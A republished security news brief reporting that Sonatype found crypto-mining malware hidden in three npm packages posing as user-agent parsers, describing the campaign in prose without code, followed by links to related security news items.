[TheRecord] Crypto-miner found hidden inside three npm libraries

DevOps security firm Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded on the official npm package repository.

The three files, disguised as user-agent string parsers, would detect the user’s operating system and then run a BAT or Shell script, based on the victim’s platform.

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” said Sonatype security researcher Ali ElShakankiry, who discovered the campaign.

This campaign’s specifics include:

The names of the three npm packages were: klowklownokhsa.The packages were live only for a day, on October 15.None of the three libraries were downloaded more than 150 times, individually.The final payloads (cryptominers) could run on Windows or Linux platforms.All three packages were uploaded from the same account.

The number of malicious packages uploaded on the npm repository has been rising, but this is actually a good thing rather than a negative aspect, as this is the byproduct of companies like Snyk and Sonatype constantly monitoring new uploads and package updates for malicious code and catching miscreants before they do more damage and before packages are downloaded thousands of times in real-world projects.

The post Crypto-miner found hidden inside three npm libraries appeared first on The Record by Recorded Future.

Source: Read More (The Record by Recorded Future)

You might be interested in …

Daily NCSC-FI news followup 2021-02-17

Poliisi varoittaa erittäin vahingollisista huijaus­tekstiviesteistä älä klikkaa linkkiä www.is.fi/digitoday/tietoturva/art-2000007808031.html Poliisi ohjeistaa olemaan tarkkana tulevien tekstiviestien ja etenkin niiden sisältämien linkkien kanssa.. katso myös www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/saitko-tekstiviestin-postin-nimissa-varothan-viesti-voi-olla-huijaus Alert (AA21-048A) – AppleJeus: Analysis of North Koreas Cryptocurrency Malware us-cert.cisa.gov/ncas/alerts/aa21-048a This joint advisory is the result of analytic efforts among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure […]

Read More

[NCSC-FI News] Phishing kits constantly evolve to evade security software

Modern phishing kits sold on cybercrime forums as off-the-shelve packages feature multiple, sophisticated detection avoidance and traffic filtering systems to ensure that internet security solutions won’t mark them as a threat. Source: Read More (NCSC-FI daily news followup)

Read More

[NCSC-FI News] Ghostwriter in the Shell: Expanding on Mandiant’s Attribution of UNC1151 to Belarus

This research expands on Mandiant’s public attribution of UNC1151 and Ghostwriter activity to entities in Belarus and describes Russian military organizational influence in Minsk, substantiating a likely nexus to Russian interests. The time frame for our research spans between March 2017 through the present and employs data from the Recorded Future Platform with open source […]

Read More